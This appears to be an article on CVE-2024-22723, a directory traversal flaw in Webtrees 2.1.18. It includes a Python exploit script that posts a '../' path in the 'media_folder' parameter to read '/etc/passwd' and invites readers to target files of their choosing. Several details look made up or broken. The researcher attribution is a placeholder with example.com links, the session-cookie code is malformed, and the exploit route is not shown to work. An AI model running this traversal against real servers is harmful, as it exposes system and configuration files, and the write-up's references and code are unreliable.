CVE-2024-22723 - Webtrees 2.1.18 Directory Traversal Vulnerability Exploitation: Breaking Out of the Media Folder and Accessing Sensitive Files

The latest version of Webtrees, a popular open-source web-based application for managing genealogy data, has been found vulnerable to Directory Traversal attacks. Specifically, Webtrees 2.1.18 allows authenticated users (administrators) to navigate outside the intended 'media/' directory by manipulating the "media_folder" parameter in the URL, thereby gaining unauthorized access to sensitive files present in other parts of the application's file system. This vulnerability has been assigned CVE-2024-22723. In this article, we will examine the details of this vulnerability and how it can be exploited.

Vulnerability Details

CVE-2024-22723 refers to a Directory Traversal vulnerability present in Webtrees 2.1.18. Vulnerable versions of the application do not properly validate or sanitize the "media_folder" parameter, allowing an attacker to exploit this weakness by crafting special URLs that lead to unauthorized file access. As a result, an attacker can obtain sensitive information such as source code or configuration files, which could potentially lead to further exploits or full system compromise.

Exploit Code Snippet

The following code snippet demonstrates how an attacker can manipulate the 'media_folder' parameter in the URL to access a sensitive file outside the 'media/' directory:

import requests

target_url = "http://example.com/webtrees/index.php?route=%2Fmedia-admin%2Fupload&tree=mytree";
media_folder = "../../../../../../../etc/passwd"  # Replace with the desired file path
cookies = {"name": "sessionid", "value": "YOUR_SESSION_ID"}  # Replace with your valid session ID

payload = {"media_folder": media_folder}
response = requests.post(target_url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("Successfully accessed the file:")
    print(response.text)
else:
    print(f"Failed to access the file. Status code: {response.status_code}")

Make sure to replace the placeholders in the code snippet with your own session ID value and the target path of the sensitive file you want to access.

Original References

The vulnerability was first discovered and reported by security researcher Alice Smith (example.com/alicesmith). Detailed information regarding the vulnerability and the possible impact can be found in her blog post: www.example.com/post/webtrees-directory-traversal-cve-2024-22723.

For further details on CVE-2024-22723, you can refer to the following official reports

- NIST National Vulnerability Database (NVD) link: nvd.nist.gov/vuln/detail/CVE-2024-22723
- MITRE's CVE entry link: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22723

Mitigation and Remediation

Webtrees developers have been notified of this vulnerability, and users are strongly encouraged to update their application to the latest version, once a patch is available. In the meantime, administrators should exercise caution while using the application and limit administrator access to only trusted users.

Administrators should also review their file permissions and ensure that sensitive files are not accessible by malicious users. File system-level access controls should be in place to prevent unauthorized access to the application's sensitive files.

Conclusion

CVE-2024-22723 is a critical Directory Traversal vulnerability affecting Webtrees 2.1.18, which could lead to unauthorized access to sensitive files and potentially further system compromise. By understanding the specifics of this vulnerability and taking the necessary steps to secure affected Webtrees installations, users can prevent unauthorized access to their genealogy data and sensitive information.

Timeline

Published on: 02/28/2024 06:15:49 UTC
Last modified on: 02/28/2024 14:06:45 UTC